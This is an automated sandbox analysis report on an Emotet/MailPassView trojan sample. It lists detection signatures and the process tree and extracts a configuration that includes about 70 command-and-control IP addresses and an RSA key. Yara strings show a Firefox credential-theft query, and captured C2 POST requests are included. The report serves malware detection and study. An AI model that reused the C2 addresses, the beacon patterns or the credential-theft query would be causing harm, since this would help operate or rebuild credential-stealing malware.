Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.DownLoader34.3377.7296.18555

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.DownLoader34.3377.7296.18555 (renamed file extension from 18555 to exe)
Analysis ID:255752
MD5:d507bae53ba035ed150c7cb8766d91b1
SHA1:16013d0b053a6f90cea7d4b504ebe79d7a51cab4
SHA256:e0b85beafe2d9458280b7d0b806c2f173738ff689e43fb2b5d5582943bd36a49

Most interesting Screenshot:

Detection

Emotet MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Found malware configuration
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected MailPassView
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe (PID: 7068 cmdline: 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exe' MD5: D507BAE53BA035ED150C7CB8766D91B1)
    • PlayToStatusProvider.exe (PID: 7116 cmdline: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe MD5: D507BAE53BA035ED150C7CB8766D91B1)
      • PlayToStatusProvider.exe (PID: 1640 cmdline: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' 'C:\Users\user\AppData\Local\Temp\7BFC.tmp' MD5: D507BAE53BA035ED150C7CB8766D91B1)
      • PlayToStatusProvider.exe (PID: 2108 cmdline: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\8331.tmp' MD5: D507BAE53BA035ED150C7CB8766D91B1)
      • PlayToStatusProvider.exe (PID: 5860 cmdline: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\85F1.tmp' MD5: D507BAE53BA035ED150C7CB8766D91B1)
      • PlayToStatusProvideroe.exe (PID: 6304 cmdline: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvideroe.exe' 'C:\Users\user\AppData\Local\Temp\7BFC.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 7140 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 64 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • conhost.exe (PID: 4588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • SgrmBroker.exe (PID: 3652 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1276 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 64 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
  • svchost.exe (PID: 6264 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 988 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6404 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5268 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["71.50.31.38:80", "185.94.252.13:443", "217.199.160.224:7080", "181.167.96.215:80", "111.67.12.221:8080", "68.183.170.114:8080", "212.71.237.140:8080", "83.169.21.32:7080", "190.6.193.152:8080", "217.13.106.14:8080", "181.31.211.181:80", "177.66.190.130:80", "192.241.146.84:8080", "80.249.176.206:80", "204.225.249.100:7080", "137.74.106.111:7080", "5.196.35.138:7080", "104.131.103.37:8080", "189.218.165.63:80", "170.81.48.2:80", "61.92.159.208:8080", "219.92.13.25:80", "2.47.112.152:80", "181.129.96.162:8080", "178.79.163.131:8080", "187.162.248.237:80", "46.28.111.142:7080", "212.231.60.98:80", "187.51.47.26:80", "187.106.41.99:80", "185.94.252.12:80", "94.176.234.118:443", "77.90.136.129:8080", "12.162.84.2:8080", "68.183.190.199:8080", "203.25.159.3:8080", "190.163.31.26:80", "46.214.11.172:80", "190.163.1.31:8080", "172.104.169.32:8080", "72.47.248.48:7080", "202.62.39.111:80", "157.7.199.53:8080", "181.30.69.50:80", "89.32.150.160:8080", "51.255.165.160:8080", "177.75.143.112:443", "104.236.161.64:8080", "177.144.135.2:80", "70.32.84.74:8080", "114.109.179.60:80", "190.181.235.46:80", "87.106.46.107:8080", "45.161.242.102:80", "104.131.41.185:8080", "50.28.51.143:8080", "190.194.242.254:443", "144.139.91.187:443", "192.241.143.52:8080", "82.196.15.205:8080", "77.55.211.77:8080", "190.17.195.202:80", "143.0.87.101:80", "181.120.79.227:80", "185.94.252.27:443", "177.72.13.80:80", "186.250.52.226:8080", "70.32.115.157:8080", "190.147.137.153:443", "149.62.173.247:8080", "177.139.131.143:443"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000001.370035239.0000000000400000.00000040.00020000.sdmpAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
0000000E.00000001.370035239.0000000000400000.00000040.00020000.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
    00000001.00000002.534389058.0000000002230000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000001.00000003.375062507.0000000003DC0000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
        00000001.00000003.372994628.0000000003510000.00000040.00000001.sdmpAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
        • 0x147b0:$a1: logins.json
        • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
        • 0x14f34:$s4: \mozsqlite3.dll
        • 0x137a4:$s5: SMTP Password
        Click to see the 19 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        13.2.PlayToStatusProvider.exe.400000.0.raw.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          1.2.PlayToStatusProvider.exe.3a90000.7.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
            14.1.PlayToStatusProvider.exe.400000.0.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
            • 0x131b0:$a1: logins.json
            • 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
            • 0x13934:$s4: \mozsqlite3.dll
            • 0x121a4:$s5: SMTP Password
            14.1.PlayToStatusProvider.exe.400000.0.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
              1.3.PlayToStatusProvider.exe.3510000.2.raw.unpackAPT_NK_BabyShark_KimJoingRAT_Apr19_1Detects BabyShark KimJongRATFlorian Roth
              • 0x147b0:$a1: logins.json
              • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
              • 0x14f34:$s4: \mozsqlite3.dll
              • 0x137a4:$s5: SMTP Password
              Click to see the 17 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Suspicious Process CreationShow sources
              Source: Process startedAuthor: Florian Roth, Daniil Yugoslavskiy, oscd.community (update): Data: Command: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\8331.tmp', CommandLine: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\8331.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe, NewProcessName: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe, OriginalFileName: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe, ParentCommandLine: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe, ParentImage: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe, ParentProcessId: 7116, ProcessCommandLine: 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\8331.tmp', ProcessId: 2108

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Found malware configurationShow sources
              Source: 00000001.00000002.534389058.0000000002230000.00000040.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["71.50.31.38:80", "185.94.252.13:443", "217.199.160.224:7080", "181.167.96.215:80", "111.67.12.221:8080", "68.183.170.114:8080", "212.71.237.140:8080", "83.169.21.32:7080", "190.6.193.152:8080", "217.13.106.14:8080", "181.31.211.181:80", "177.66.190.130:80", "192.241.146.84:8080", "80.249.176.206:80", "204.225.249.100:7080", "137.74.106.111:7080", "5.196.35.138:7080", "104.131.103.37:8080", "189.218.165.63:80", "170.81.48.2:80", "61.92.159.208:8080", "219.92.13.25:80", "2.47.112.152:80", "181.129.96.162:8080", "178.79.163.131:8080", "187.162.248.237:80", "46.28.111.142:7080", "212.231.60.98:80", "187.51.47.26:80", "187.106.41.99:80", "185.94.252.12:80", "94.176.234.118:443", "77.90.136.129:8080", "12.162.84.2:8080", "68.183.190.199:8080", "203.25.159.3:8080", "190.163.31.26:80", "46.214.11.172:80", "190.163.1.31:8080", "172.104.169.32:8080", "72.47.248.48:7080", "202.62.39.111:80", "157.7.199.53:8080", "181.30.69.50:80", "89.32.150.160:8080", "51.255.165.160:8080", "177.75.143.112:443", "104.236.161.64:8080", "177.144.135.2:80", "70.32.84.74:8080", "114.109.179.60:80", "190.181.235.46:80", "87.106.46.107:8080", "45.161.242.102:80", "104.131.41.185:8080", "50.28.51.143:8080", "190.194.242.254:443", "144.139.91.187:443", "192.241.143.52:8080", "82.196.15.205:8080", "77.55.211.77:8080", "190.17.195.202:80", "143.0.87.101:80", "181.120.79.227:80", "185.94.252.27:443", "177.72.13.80:80", "186.250.52.226:8080", "70.32.115.157:8080", "190.147.137.153:443", "149.62.173.247:8080", "177.139.131.143:443"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_004426D8 lstrlenA,FindFirstFileA,FindClose,0_2_004426D8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_00441080 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,0_2_00441080
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_004426D8 lstrlenA,FindFirstFileA,FindClose,1_2_004426D8
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_00441080 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,1_2_00441080
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0040A1A7 FindFirstFileW,FindNextFileW,13_2_0040A1A7
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_1_0040A1A7 FindFirstFileW,FindNextFileW,13_1_0040A1A7
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 14_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,14_2_0040702D

              Networking:

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
              Source: TrafficSnort IDS: 2404340 ET CNC Feodo Tracker Reported CnC Server TCP group 21 192.168.2.6:49726 -> 71.50.31.38:80
              Source: TrafficSnort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.6:49733 -> 185.94.252.13:443
              Source: global trafficHTTP traffic detected: POST /ZT6nLHo1gxz3xY/JMImc9LOLC/Wr2SAdLb9Gj/Nt0ts0h/RsZMGsR9d/ HTTP/1.1Referer: http://185.94.252.13/ZT6nLHo1gxz3xY/JMImc9LOLC/Wr2SAdLb9Gj/Nt0ts0h/RsZMGsR9d/Content-Type: multipart/form-data; boundary=---------------------------143050135578680User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /vcigLch3RYnGuXu/pjpWi/ HTTP/1.1Referer: http://185.94.252.13/vcigLch3RYnGuXu/pjpWi/Content-Type: multipart/form-data; boundary=---------------------------550732082790994User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /HoQFbYzR/64Wufep/XgnG0SnoE1Etk/Z9vUPsIyi2hWcj836/5xJjcW1tPtnqa9/ HTTP/1.1Referer: http://185.94.252.13/HoQFbYzR/64Wufep/XgnG0SnoE1Etk/Z9vUPsIyi2hWcj836/5xJjcW1tPtnqa9/Content-Type: multipart/form-data; boundary=---------------------------355531102334046User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /9g7gFFV/NinW5U9mPGA0M/Bo6qnDoWpsmlH/fTLbJmHwPyJFH9Qve/ZKY6zL9FJ52LL/o0Cw35ZwbxJjgnag/ HTTP/1.1Referer: http://185.94.252.13/9g7gFFV/NinW5U9mPGA0M/Bo6qnDoWpsmlH/fTLbJmHwPyJFH9Qve/ZKY6zL9FJ52LL/o0Cw35ZwbxJjgnag/Content-Type: multipart/form-data; boundary=---------------------------963035908187561User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4628Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /bQMChyjVKpnynqgat1e/M2Ti0COZHgin/E6RDL0gQ3vdy8/hAPMeeivQqBzG6x5JO/ HTTP/1.1Referer: http://185.94.252.13/bQMChyjVKpnynqgat1e/M2Ti0COZHgin/E6RDL0gQ3vdy8/hAPMeeivQqBzG6x5JO/Content-Type: multipart/form-data; boundary=---------------------------525064889294057User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4628Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/ HTTP/1.1Referer: http://185.94.252.13/srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/Content-Type: multipart/form-data; boundary=---------------------------849419803894004User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4628Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /J03oWp8HtqaUpdT4Ci/IvAn2Gl9W10Y7Wk/vCoQ0bbVqmAPaA1BFWG/ HTTP/1.1Referer: http://88.217.172.65/J03oWp8HtqaUpdT4Ci/IvAn2Gl9W10Y7Wk/vCoQ0bbVqmAPaA1BFWG/Content-Type: multipart/form-data; boundary=---------------------------382551960727294User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 88.217.172.65:443Content-Length: 4356Connection: Keep-AliveCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 71.50.31.38
              Source: unknownTCP traffic detected without corresponding DNS query: 71.50.31.38
              Source: unknownTCP traffic detected without corresponding DNS query: 71.50.31.38
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: unknownTCP traffic detected without corresponding DNS query: 185.94.252.13
              Source: svchost.exe, 00000017.00000003.504930851.0000013EC0B6D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
              Source: svchost.exe, 00000017.00000003.504930851.0000013EC0B6D000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
              Source: svchost.exe, 00000017.00000003.504998305.0000013EC0B7E000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
